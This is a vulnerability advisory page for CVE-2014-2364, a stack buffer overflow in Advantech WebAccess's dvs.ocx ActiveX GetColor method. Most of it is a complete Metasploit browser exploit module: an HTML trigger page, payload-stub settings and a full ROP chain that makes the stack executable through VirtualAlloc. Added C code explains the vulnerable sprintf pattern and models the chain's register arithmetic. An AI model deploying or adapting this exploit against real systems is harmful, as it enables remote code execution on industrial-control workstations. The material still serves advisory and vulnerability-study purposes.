Advantech WebAccess dvs.ocx GetColor Buffer Overflow

29 Sep 2014, reported by RootType (seebug, www.seebug.org)

A stack buffer overflow in the dvs.ocx ActiveX control shipped with Advantech WebAccess (CVE-2014-2364) allows remote attackers to execute arbitrary code via user-controlled data passed to the control's GetColor method; an attacker only needs the victim to open a web page that instantiates the control in Internet Explorer.
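The root-cause pattern the module below names (a sprintf call reachable with user-controlled data) written out in C beside a bounded version. This is an added example, not code from the Metasploit module or from Advantech: the page gives neither the real buffer size nor the format string nor the function shape, so COLOR_BUF_SIZE, the "%s" format and the GetColor-like signatures are assumptions used only to show the pattern. It goes a little beyond the specific case: would_overflow() measures any input against the buffer without writing, and the hardened path checks snprintf's return value instead of trusting a length cap alone.

```c
/* Added example, not code from the Metasploit module or from Advantech.
 * Buffer size, format string and function shapes are assumptions. */
#include <stdio.h>
#include <string.h>

#define COLOR_BUF_SIZE 64          /* assumed fixed-size stack buffer */

/* Vulnerable shape: sprintf copies the whole caller string into a fixed
 * stack buffer. A name longer than COLOR_BUF_SIZE - 1 bytes runs past the
 * buffer into saved registers and the return address, which is the
 * condition the module's ROP chain relies on. Only call with short input;
 * this shows the pattern, it is not a crash demo. */
static int get_color_vulnerable(const char *name, int index) {
    char buf[COLOR_BUF_SIZE];
    sprintf(buf, "%s", name);          /* no bound: classic stack overflow */
    return (int)strlen(buf) + index;   /* stand-in for the real lookup */
}

/* How many bytes the unbounded write would need, without performing it.
 * Returns 1 when the input would overrun COLOR_BUF_SIZE, else 0. */
static int would_overflow(const char *name) {
    int needed = snprintf(NULL, 0, "%s", name) + 1;   /* +1 for the NUL */
    return needed > COLOR_BUF_SIZE;
}

/* Hardened shape: reject over-long input before formatting, then use a
 * bounded formatter and check its return value (snprintf reports the
 * length it wanted, so truncation is detectable). Returns -1 on rejection,
 * otherwise the same stand-in result as the vulnerable version. */
static int get_color_safe(const char *name, int index, char *out, size_t out_len) {
    if (name == NULL || out == NULL || out_len == 0) return -1;
    if (strlen(name) >= out_len) return -1;           /* reject up front */
    int n = snprintf(out, out_len, "%s", name);
    if (n < 0 || (size_t)n >= out_len) return -1;     /* would have truncated */
    return n + index;
}

/* Wrapper with a local buffer so the safe path is one call. */
static int safe_lookup(const char *name, int index) {
    char buf[COLOR_BUF_SIZE];
    return get_color_safe(name, index, buf, sizeof buf);
}

/* Constructed sample input: 120 'A's, well past the assumed 64-byte buffer. */
static const char *sample_overlong(void) {
    static char s[121];
    if (s[0] == '\0') { memset(s, 'A', 120); s[120] = '\0'; }
    return s;
}
```

The check that matters is the one on snprintf's return value: a bounded formatter silently truncates, and code that later assumes the full string was written can turn a rejected overflow into a logic bug, so the hardened version treats a truncated write as an error rather than a success.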

Code

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability in Advantech WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
        7 SP1 with IE8 and IE9.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions'      =>
        {
          'Retries'              => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'             =>
        {
          'Space'           => 1024,
          'DisableNops'     => true,
          'BadChars'        => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                               "\x83\xC0\x08"             + # add eax, byte 8
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
        },
      'Platform'            => 'win',
      'Arch'                => ARCH_X86,
      'Targets'             =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'       => 0,
      'DisclosureDate'      => 'Jul 17 2014'))
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")
 
    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS
 
    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end
 
  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61) # offset
    xpl << [0x60014185].pack("V")    # RET
    xpl << rand_text_alphanumeric(8)
 
    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V") # POP EBP # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end
    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V") # POP EBP # RETN
    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V") # POP ESI # RETN
    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
    # ESP = lpAddress (automatic)
    # PUSHAD # RETN
    xpl << [0x60018399].pack("V") # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
    xpl << code
 
    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
 
    xpl
  end
 
end
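The register arithmetic and the PUSHAD frame that rop_payload() above depends on, modelled in C so the chain's comments can be checked against the constants it uses. This is an added example, not part of the Metasploit module, and nothing in it executes a gadget: x86 semantics for ADC, MUL, INC and PUSHAD are reproduced on plain integers. Gadget addresses, the IAT slot and the immediates are the module's own; the stack address used as lpAddress is a placeholder, and the carry flag at chain entry is assumed clear (with CF set the first constant gives dwSize 0x41, which VirtualAlloc rounds up to a page anyway).

```c
/* Added example, not part of the Metasploit module: a model of the
 * arithmetic and stack layout the ROP chain relies on. Gadget and IAT
 * addresses are from the chain; ESP_AT_PUSHAD is an assumed placeholder. */
#include <stdint.h>

#define ADC_IMM            0x60025078u  /* ADC EAX,60025078 # RETN */
#define MINUS_ONE          0xffffffffu  /* popped into ECX before MUL */
#define GADGET_POP_EBP_RET 0x6002054bu  /* POP EBP # RETN */
#define GADGET_JMP_EAX     0x6002176eu  /* JMP [EAX] */
#define GADGET_RET         0x60021ad2u  /* RETN, the ROP NOP */
#define IAT_VIRTUALALLOC   0x600250c8u  /* ptr to &VirtualAlloc in ijl11.dll */
#define ESP_AT_PUSHAD      0x0012f000u  /* assumption: "some stack address" */

typedef struct { uint32_t eax, ecx, edx, ebx, esp, ebp, esi, edi; } regs32;

/* ADC EAX,imm32 then MUL ECX with ECX == -1: EDX:EAX = EAX * (2^32 - 1),
 * so EDX = EAX - 1 for any EAX >= 1. That is how the chain lands small
 * values (0x40, 0x1000) in EDX using immediates that contain none of the
 * bad chars \x00 \x0a \x0d \x5c. cf_in is the carry flag before the ADC. */
static uint32_t adc_mul_edx(uint32_t eax_popped, int cf_in) {
    uint32_t eax = eax_popped + ADC_IMM + (cf_in ? 1u : 0u);  /* wraps mod 2^32 */
    uint64_t prod = (uint64_t)eax * MINUS_ONE;
    return (uint32_t)(prod >> 32);                             /* EDX */
}

/* 0x41 repetitions of "INC ECX # MOV [EAX],ECX # RETN" from ECX = -1.
 * The stores go to [EAX], which the chain points at ijl11.dll's .data. */
static uint32_t inc_ecx_times(uint32_t ecx, unsigned n) {
    while (n--) ecx += 1;      /* 0xffffffff + 0x41 wraps to 0x40 */
    return ecx;
}

/* PUSHAD pushes EAX, ECX, EDX, EBX, ESP (value before the push), EBP,
 * ESI, EDI. Afterwards ESP points at the EDI slot, so frame[0] is what
 * the following RETN pops first. */
static void pushad_frame(const regs32 *r, uint32_t frame[8]) {
    frame[0] = r->edi; frame[1] = r->esi; frame[2] = r->ebp; frame[3] = r->esp;
    frame[4] = r->ebx; frame[5] = r->edx; frame[6] = r->ecx; frame[7] = r->eax;
}

/* PUSHAD # RETN pops frame[0] (RETN), which pops frame[1] (JMP [EAX], i.e.
 * VirtualAlloc). VirtualAlloc, stdcall, then sees frame[2] as its return
 * address and frame[3..6] as lpAddress, dwSize, flAllocationType,
 * flProtect. On return, POP EBP # RETN discards frame[7] and returns to
 * the dword at the saved ESP: the chain's "push esp # retn", which lands
 * in the shellcode that follows it. */
typedef struct { uint32_t ret_to, lpAddress, dwSize, flAllocationType, flProtect; } va_call;

static va_call virtualalloc_view(const uint32_t frame[8]) {
    va_call c = { frame[2], frame[3], frame[4], frame[5], frame[6] };
    return c;
}

/* Registers as the chain leaves them right before PUSHAD. */
static regs32 module_regs(void) {
    regs32 r;
    r.ebx = adc_mul_edx(0x9ffdafc9u, 0);  /* EDX, moved to EBX via push edx / pop ebx */
    r.edx = adc_mul_edx(0x9ffdbf89u, 0);  /* CF cleared by "or al,39h" in between */
    r.ecx = inc_ecx_times(MINUS_ONE, 0x41);
    r.eax = IAT_VIRTUALALLOC;
    r.ebp = GADGET_POP_EBP_RET;
    r.esi = GADGET_JMP_EAX;
    r.edi = GADGET_RET;
    r.esp = ESP_AT_PUSHAD;
    return r;
}

static uint32_t module_frame_slot(int i) {
    regs32 r = module_regs();
    uint32_t f[8];
    pushad_frame(&r, f);
    return f[i & 7];
}

static va_call module_virtualalloc_call(void) {
    regs32 r = module_regs();
    uint32_t f[8];
    pushad_frame(&r, f);
    return virtualalloc_view(f);
}
```

Read against the chain: dwSize 0x40, flAllocationType 0x1000 (MEM_COMMIT) and flProtect 0x40 (PAGE_EXECUTE_READWRITE) match the module's comments, and lpAddress is whatever ESP held at PUSHAD, so the call makes the page holding the chain and payload executable rather than allocating somewhere new. Each "RETN 0x10" in the chain is what the four padding dwords after it absorb.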
                              

Vulners AI Score: 7.1 (High risk)
EPSS: 0.40188